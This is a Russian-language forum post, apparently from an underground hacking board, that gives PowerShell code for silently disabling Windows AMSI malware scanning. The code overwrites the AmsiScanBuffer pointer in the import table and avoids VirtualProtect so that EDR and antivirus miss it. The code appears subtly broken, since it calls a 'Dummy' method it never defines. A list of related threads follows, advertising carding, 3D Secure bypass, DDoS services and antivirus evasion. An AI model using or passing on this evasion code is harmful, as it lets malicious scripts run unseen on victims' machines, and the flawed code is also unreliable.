Статья Тихий обход AMSI через модификацию таблицы импорта

devqp

Специалист
Метод обхода AMSI (Antimalware Scan Interface) использует записываемые записи в таблице импорта (IAT) зависимостей программы, избегая подозрительных вызовов VirtualProtect. Это позволяет модифицировать память без триггерения мониторинга EDR/антивирусов.

Принцип работы:
1. Локализуется указатель на целевую функцию AMSI в памяти
2. Через поиск в IAT находится записываемое место
3. Оригинальный указатель заменяется на пустышку

PowerShell-реализация:
Код:
function Bypass-AMSI {
    param($InitialStart=0x50000, $NegativeOffset=0x50000, $MaxOffset=0x1000000, $ReadBytes=0x50000)
    
    Add-Type @"
    using System;
    using System.Runtime.InteropServices;
    public class APIs {
        [DllImport("kernel32.dll")]
        public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, ref uint lpNumberOfBytesRead);
        
        [DllImport("kernel32.dll")]
        public static extern IntPtr GetCurrentProcess();
        
        [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true)]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        
        [DllImport("kernel32.dll", CharSet=CharSet.Auto)]
        public static extern IntPtr GetModuleHandle(string lpModuleName);
    }
"@

    $string = 'amsi.dll'
    $string2 = 'AmsiScan'
    $string3 = 'Buffer'
    
    $Address = [APIs]::GetModuleHandle($string)
    $funcAddr = [APIs]::GetProcAddress($Address, $string2 + $string3)
    $Handle = [APIs]::GetCurrentProcess()
    
    $dummy = 0
    for($j=$InitialStart; $j -lt $MaxOffset; $j+=$NegativeOffset) {
        $MethodPointerToSearch = [IntPtr]($funcAddr.ToInt64() - $j)
        $ReadedMemoryArray = [byte[]]::new($ReadBytes)
        [void][APIs]::ReadProcessMemory($Handle, $MethodPointerToSearch, $ReadedMemoryArray, $ReadBytes, [ref]$dummy)
        
        for($i=0; $i -lt $ReadedMemoryArray.Length-8; $i+=8) {
            $bytes = $ReadedMemoryArray[$i..($i+7)]
            $PointerToCompare = [BitConverter]::ToInt64($bytes, 0)
            if($PointerToCompare -eq $funcAddr.ToInt64()) {
                $MemoryToPatch = [IntPtr]($MethodPointerToSearch.ToInt64() + $i)
                break
            }
        }
    }
    
    $dummyPointer = [APIs].GetMethod('Dummy').MethodHandle.GetFunctionPointer()
    $buf = [IntPtr[]]($dummyPointer)
    [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $MemoryToPatch, 1)
}

Ключевые особенности:
• Поиск целевого указателя через GetProcAddress и смещение в IAT
• Чтение памяти процесса через ReadProcessMemory
• Замена оригинального указателя функцией-заглушкой
• Отсутствие вызовов VirtualProtect, что снижает детектабельность
 
Похожие темы
Admin Интересно Тихий океан закипает. Вероятность возвращения Эль-Ниньо в 2026 году достигла 96%. Новости в сети 0
Admin Интересно Тихий взлом и полная невидимость. Рассказываем, как новый вирус RoadK1ll захватывает корпоративные сети. Новости в сети 0
Support81 Тихий свидетель: смарт-колонки выдают информацию полиции Новости в сети 0
M Тихий майнер исходник и бинарники ! Слив Способы заработка 5
devqp Статья Обход 3D Secure: методы сбора CC в электронной коммерции Фишинг, мошенничество, СИ 1
roll666 Продам VOLTREX VPN | 3 ДНЯ БЕСПЛАТНО | ОБХОД БС | от 95₽ | БЕЗЛИМИТ | 50+ серверов | VLESS + REALITY Доступы: RDP, VPS, SQL inj, базы, сайты, shell's 3
devqp Статья Обход детектирования root-прав и эмуляции в Android-приложениях через Frida Уязвимости и взлом 1
devqp Статья Обход проблем с трафиком и верификацией в кардинге: 3 альтернативных метода Фишинг, мошенничество, СИ 0
devqp Статья Обход процедуры верификации InfraGard через компрометацию персональных данных Уязвимости и взлом 0
devqp Статья Обход защиты CloudFlare: методы и инструменты Уязвимости и взлом 0
Admin Интересно Обход ASLR, удалённое выполнение кода и 30 дней тишины. Что известно о новой уязвимости в nginx и почему детали пока засекречены. Новости в сети 0
Admin Интересно ИИ-модели начали размножаться в обход человека. Разбираем результаты пугающего эксперимента. Новости в сети 0
Admin Интересно Telega, iMe, Graph Messenger — скачали обход блокировки, получили слежку. Новости в сети 0
Admin Интересно Хакеры используют IP-KVM устройства для захвата компьютеров в обход защиты. Новости в сети 0
Admin Статья Обход пароля на iphone Уязвимости и взлом 0
Admin Статья Обход Virustotal Вирусология 0
Admin Статья Обход блокировок и сокрытие протокола: понимание протокола OBFS4 Анонимность и приватность 0
Admin Статья Direct Syscalls vs EDR: Как заставить Windows выполнять ваши команды в обход хуков защитного ПО Вирусология 0
Admin Статья Обход Cloudflare при запросе. Полезные статьи 0
wrangler65 Обход sms уведомлений и вход в лк: Cовременные методы работы с брут ба 2025 Все остальное 0
VNDLS Обход блокировок сервисов | Анализ | Поиск решений | Безопасность [VNDLS Bypass] Ищу работу. Предлагаю свои услуги. 0
Dostenberg SURFSHARK за 49₽ + обход блока РФ Доступы: RDP, VPS, SQL inj, базы, сайты, shell's 0
W Разработка софта, администрирование | Создание Ботов, Парсеров, обход CAPTCHA, автоотрисовщики Ищу работу. Предлагаю свои услуги. 0
B Обход защиты Предоставляю работу. Ищу специалиста. 0
X Интересно [P.K] coinsbit.io B&C [Обход капчи] Готовый софт 4
NickelBlack HatCloud - Обход Cloudflare Готовый софт 3
Sture23 Интересно Обход CloudFlare Уязвимости и взлом 1
C Интересно Обход/снятие 2fa, вывод денег без валид почты, работа с API-KEY крипто-бирж Ищу работу. Предлагаю свои услуги. 1
АнАлЬнАя ЧуПаКаБрА INLINE Обход клауда с капчей[CLOUDFLARE] Готовый софт 3
W Обход блокировки доменов VK Полезные статьи 1
grilder DDoS услуги | Обход DDoS Guard + CloudFlare + Captcha Ищу работу. Предлагаю свои услуги. 1
АнАлЬнАя ЧуПаКаБрА INLINE Обход CloudFlare Готовый софт 0
E Nulling Service || DDoS || Обход защит || Устранение конкурентов Спам: софт, базы, рассылки, отклики, ddos 2
АнАлЬнАя ЧуПаКаБрА INLINE Биржа с валидом (Есть обход) Готовый софт 4
S Обход recaptcha 2 Полезные статьи 1
K Обход 2FA (Google Authenticator, SMS) Уязвимости и взлом 0
G Сниффинг для начинающих [Sniffing for beginners] Обход VLAN Полезные статьи 0
K Инструкция по Ettercap: атака человек-посередине (MitM), перехват паролей, обход HSTS, подмена данных на лету ЧАСТЬ 2 Уязвимости и взлом 0
K Инструкция по Ettercap: атака человек-посередине (MitM), перехват паролей, обход HSTS, подмена данных на лету ЧАСТЬ 1 Уязвимости и взлом 1
G Обход антивируса с помощью зашифрованных Payload, используя VENOM Уязвимости и взлом 0
АнАлЬнАя ЧуПаКаБрА INLINE Обход CloudFlare PK&UBC [Node.JS] Готовый софт 0
АнАлЬнАя ЧуПаКаБрА INLINE Рабочий обход CloudFlare для Private Keeper'a ( от 01.12.2017 ) Полезные статьи 0
Y Незаметный обход пароля Windows без его смены или сброса Готовый софт 5
E Обход UAC Win 7/8/8.1/10 Полезные статьи 0
A Обход антивирусов, антиэмуляция. Часть III Программирование 2
A Обход антивирусов, антиэмуляция. Часть II Программирование 0
A Обход антивирусов, антиэмуляция. Часть I Программирование 0
А Обход авторизации Wi-Fi Полезные статьи 19
4 Обход пароля Windows. Полезные статьи 17
E Частичный обход аутентификации vk.com Уязвимости и взлом 1

Название темы